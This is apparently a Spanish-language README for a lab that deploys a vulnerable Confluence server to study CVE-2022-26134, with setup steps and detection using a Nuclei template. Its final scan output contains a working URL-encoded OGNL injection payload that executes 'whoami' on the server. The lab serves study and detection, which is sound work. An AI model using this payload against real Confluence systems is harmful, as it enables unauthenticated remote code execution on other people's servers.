CVE-2022-26134-LAB
Confluence Server y Confluence Data Center incluyen una importante vulnerabilidad de ejecución remota de código no autenticada identificada como CVE-2022-26134, según un aviso de seguridad publicado por Atlassian el 2 de junio de 2022. La vulnerabilidad no estaba parcheada cuando se publicó el 2 de junio y estaba siendo explotada activamente. A partir del 3 de junio, tanto los parches como una solución temporal están disponibles.
Este repositorio está destinado únicamente a fines experimentales y educativos.
Dependencias
Entorno vulnerable de Confluence
Ejecutando el entorno vulnerable
Una vez iniciado, puede acceder al servidor de Confluence usando la siguiente dirección URL:
http://127.0.0.1:8090/
Configuración del servidor de Confluence
- La primera vez que visite el sitio, se le guiará a través de la configuración.
- No marque ninguna casilla y seleccione "Next" en la página "Get apps".
- En la página de clave de licencia, haga clic en el enlace que dice "Get an evaluation license".
- Será redirigido a my.atlassian.com. Asegúrese de que el tipo de licencia seleccionado sea Confluence (Data Center). Escriba el nombre de organización que desee. Asegúrese de que el botón de opción para "Your instance is" esté seleccionado como "up and running". Una vez que haya verificado estos detalles, haga clic en el botón "Generate License".
- Aparecerá un modal de confirmación preguntando si desea instalarlo en el servidor: 127.0.0.1. Seleccione "Yes".
- Seleccionar "Yes" completará automáticamente la clave de licencia en su instancia local de Confluence. Seleccione "Next".
- Elija el tipo de implementación "Standalone" y seleccione "Next".
- En la página para configurar su base de datos, los detalles deben completarse de la siguiente manera:
- Tipo de base de datos: PostgreSQL
- Tipo de configuración: Simple
- Nombre de host: db
- Puerto: 5432
- Nombre de la base de datos: confluence
- Usuario: confluence
- Contraseña: 123456789
- Después de completar estos campos, presione el botón "Test connection". Debería recibir el mensaje "Success! Database connected successfully". Luego haga clic en "Next".
- Comenzará a configurar su base de datos. Esto puede tomar un tiempo. Tenga paciencia.
- Una vez que la configuración de la base de datos esté completa, estará en la página "Load Content". Seleccione el botón "Example Site".
- A continuación, en la página "Configure User Management", seleccione "Manage users and groups with Confluence".
- A continuación, en la página "Configure System Administrator Account", cree una cuenta y seleccione "Next".
- Una vez completado, verá que la configuración fue exitosa. Presione "Start".
- Le pedirá que "Create a space to store your work". Introduzca cualquier nombre de espacio que desee.
- Omita el tutorial.
- Ahora ha completado la configuración de evaluación de Confluence Server.
Detección de CVE-2022-26134
La vulnerabilidad es una vulnerabilidad de inyección OGNL que afecta al servidor HTTP. La carga útil OGNL se coloca en el URI de una solicitud HTTP. Parece funcionar cualquier tipo de método HTTP, ya sea válido (GET, POST, PUT, etc.) o inválido (p. ej., “BALH”).
https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
Uso de Nuclei
Ejecute el siguiente comando de Nuclei:
nuclei -u http://127.0.0.1:8090 -t nuclei-templates/cves/2022/CVE-2022-26134.yaml
Salida del escaneo
[CVE-2022-26134] [http] [critical] http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ [confluence]